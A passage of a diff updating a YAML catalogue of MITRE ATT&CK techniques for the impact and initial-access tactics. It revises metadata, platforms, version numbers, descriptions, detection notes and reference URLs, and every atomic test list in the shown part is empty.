+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -57707,11 +58686,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -57734,6 +58712,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57751,9 +58730,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -57779,9 +58759,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -57868,7 +58847,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -57892,12 +58871,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -57916,7 +58894,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -57933,18 +58910,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -57968,8 +58940,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -57989,33 +58961,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58026,7 +58987,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -58043,8 +59004,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -58063,99 +59027,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests: []
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -58164,7 +59102,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58190,9 +59128,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -58248,55 +59187,11 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests: []
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58311,6 +59206,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -58323,16 +59222,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -58400,11 +59335,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58422,7 +59356,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58449,7 +59383,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -58499,13 +59433,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -58573,11 +59506,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -58642,13 +59574,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58726,7 +59657,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -58776,11 +59706,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -58819,10 +59748,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -58839,7 +59768,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -58878,12 +59807,11 @@ initial-access:
